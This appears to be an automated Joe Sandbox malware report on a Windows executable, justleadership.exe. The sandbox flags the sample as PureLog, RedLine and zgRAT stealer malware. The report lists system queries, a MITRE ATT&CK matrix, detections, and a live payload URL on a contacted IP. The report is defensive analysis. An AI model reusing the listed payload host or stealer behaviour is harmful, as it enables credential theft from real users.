                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\modern.fon VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\roman.fon VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\script.fon VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\coure.fon VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\sserife.fon VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\sseriff.fon VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\smalle.fon VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\justleadership.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 4.2.justleadership.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.justleadership.exe.437dc50.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.justleadership.exe.437dc50.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.2147404072.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2150003802.000000000434A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: Process Memory Space: justleadership.exe PID: 7144, type: MEMORYSTR
                    Yara detected zgRAT
                    Source: Yara matchFile source: 4.2.justleadership.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.justleadership.exe.437dc50.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.justleadership.exe.437dc50.4.raw.unpack, type: UNPACKEDPE

                    Remote Access Functionality

                    barindex
                    Yara detected PureLog Stealer
                    Source: Yara matchFile source: 4.2.justleadership.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.justleadership.exe.437dc50.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.justleadership.exe.437dc50.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.2147404072.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2150003802.000000000434A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: Process Memory Space: justleadership.exe PID: 7144, type: MEMORYSTR
                    Yara detected zgRAT
                    Source: Yara matchFile source: 4.2.justleadership.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.justleadership.exe.437dc50.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.justleadership.exe.437dc50.4.raw.unpack, type: UNPACKEDPE

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		111
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping111
                    Security Software Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Data Obfuscation                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		1
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		41
                    Virtualization/Sandbox Evasion                    		Security Account Manager41
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection                    		NTDS32
                    System Information Discovery                    		Distributed Component Object ModelInput Capture1
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA SecretsInternet Connection DiscoverySSHKeylogging1
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                    Obfuscated Files or Information                    		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Software Packing                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    justleadership.exe61%ReversingLabsByteCode-MSIL.Downloader.LummaStealer
                    justleadership.exe100%AviraHEUR/AGEN.1309900
                    justleadership.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://www.fontbureau.com0%URL Reputationsafe
                    http://www.fontbureau.com/designersG0%URL Reputationsafe
                    https://api.ip.sb/ip0%URL Reputationsafe
                    http://www.fontbureau.com/designers/?0%URL Reputationsafe
                    https://stackoverflow.com/q/14436606/233540%URL Reputationsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://www.fontbureau.com/designers?0%URL Reputationsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.fontbureau.com/designers0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.fontbureau.com/designers/cabarga.htmlN0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
                    https://stackoverflow.com/q/11564914/23354;0%URL Reputationsafe
                    https://stackoverflow.com/q/2152978/233540%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                    http://www.fontbureau.com/designers80%URL Reputationsafe
                    http://www.fonts.com0%URL Reputationsafe
                    http://www.sandoll.co.kr0%URL Reputationsafe
                    http://www.urwpp.deDPlease0%URL Reputationsafe
                    http://www.zhongyicts.com.cn0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://www.sakkal.com0%URL Reputationsafe

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://91.208.206.5/mime/Fwkbz.pdftrue
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.apache.org/licenses/LICENSE-2.0justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                        		unknown
                        http://www.fontbureau.comjustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designersGjustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                        • URL Reputation: safe
                        		unknown
                        https://api.ip.sb/ipjustleadership.exe, 00000004.00000002.2151184408.00000000032C5000.00000004.00000800.00020000.00000000.sdmptrue
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.com/designers/?justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                        • URL Reputation: safe
                        		unknown
                        https://stackoverflow.com/q/14436606/23354justleadership.exe, 00000000.00000002.2123072673.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmptrue
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cn/bThejustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                        • URL Reputation: safe
                        		unknown
                        https://github.com/mgravell/protobuf-netJjustleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmptrue
                          		unknown
                          http://www.fontbureau.com/designers?justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                          • URL Reputation: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netjustleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmptrue
                            		unknown
                            http://www.tiro.comjustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                            • URL Reputation: safe
                            		unknown
                            https://api.ip.sjustleadership.exe, 00000004.00000002.2151184408.00000000032C5000.00000004.00000800.00020000.00000000.sdmptrue
                              		unknown
                              http://www.fontbureau.com/designersjustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: safe
                              		unknown
                              http://www.goodfont.co.krjustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: safe
                              		unknown
                              http://www.galapagosdesign.com/staff/dennis.htmsjustleadership.exe, 00000004.00000002.2156474669.0000000006410000.00000004.00000020.00020000.00000000.sdmptrue
                                		unknown
                                http://www.carterandcone.comljustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                                • URL Reputation: safe
                                		unknown
                                http://www.sajatypeworks.comjustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                                • URL Reputation: safe
                                		unknown
                                http://91.208.206.5justleadership.exe, 00000000.00000002.2123072673.00000000030A1000.00000004.00000800.00020000.00000000.sdmptrue
                                  		unknown
                                  http://www.typography.netDjustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNjustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.founder.com.cn/cn/cThejustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.galapagosdesign.com/staff/dennis.htmjustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                                  • URL Reputation: safe
                                  		unknown
                                  http://fontfabrik.comjustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                                    		unknown
                                    http://www.founder.com.cn/cnjustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/frere-user.htmljustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: safe
                                    		unknown
                                    https://github.com/mgravell/protobuf-netijustleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmptrue
                                      		unknown
                                      https://stackoverflow.com/q/11564914/23354;justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmptrue
                                      • URL Reputation: safe
                                      		unknown
                                      https://stackoverflow.com/q/2152978/23354justleadership.exe, 00000000.00000002.2161742999.0000000006B90000.00000004.08000000.00040000.00000000.sdmptrue
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.jiyu-kobo.co.jp/justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                                      • URL Reputation: safe
                                      		unknown
                                      https://discord.com/api/v9/users/justleadership.exe, 00000004.00000002.2151184408.000000000335F000.00000004.00000800.00020000.00000000.sdmptrue
                                        		unknown
                                        http://www.galapagosdesign.com/DPleasejustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers8justleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fonts.comjustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sandoll.co.krjustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.urwpp.deDPleasejustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.zhongyicts.com.cnjustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                                        • URL Reputation: safe
                                        		unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namejustleadership.exe, 00000000.00000002.2123072673.00000000030A1000.00000004.00000800.00020000.00000000.sdmptrue
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.sakkal.comjustleadership.exe, 00000004.00000002.2156980685.0000000006622000.00000004.00000800.00020000.00000000.sdmptrue
                                        • URL Reputation: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        91.208.206.5
                                        		unknownunknown
                                        		200019ALEXHOSTMDfalse

                                        General Information

                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1534477
                                        Start date and time:2024-10-15 22:47:08 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 6m 47s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:8
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:justleadership.exe
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@4/1@0/1
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 95%
                                        • Number of executed functions: 347
                                        • Number of non-executed functions: 28
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtEnumerateValueKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: justleadership.exe

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        16:48:36API Interceptor8x Sleep call for process: justleadership.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        91.208.206.5VSE57F94EuGet hashmaliciousUnknownBrowse
                                          DEzxZHELZgGet hashmaliciousUnknownBrowse

                                            Domains

                                            No context

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            ALEXHOSTMDNjINZzXcCF.exeGet hashmaliciousScreenConnect ToolBrowse
                                            • 176.123.1.130
                                            TrsaYn3QG2.exeGet hashmaliciousScreenConnect ToolBrowse
                                            • 176.123.1.130
                                            lQd0v7fqMj.msiGet hashmaliciousScreenConnect ToolBrowse
                                            • 176.123.1.130
                                            QlIpkzApq6.msiGet hashmaliciousScreenConnect ToolBrowse
                                            • 176.123.1.130
                                            na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 176.123.1.111
                                            na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 176.123.1.111
                                            na.elfGet hashmaliciousGafgyt, MiraiBrowse
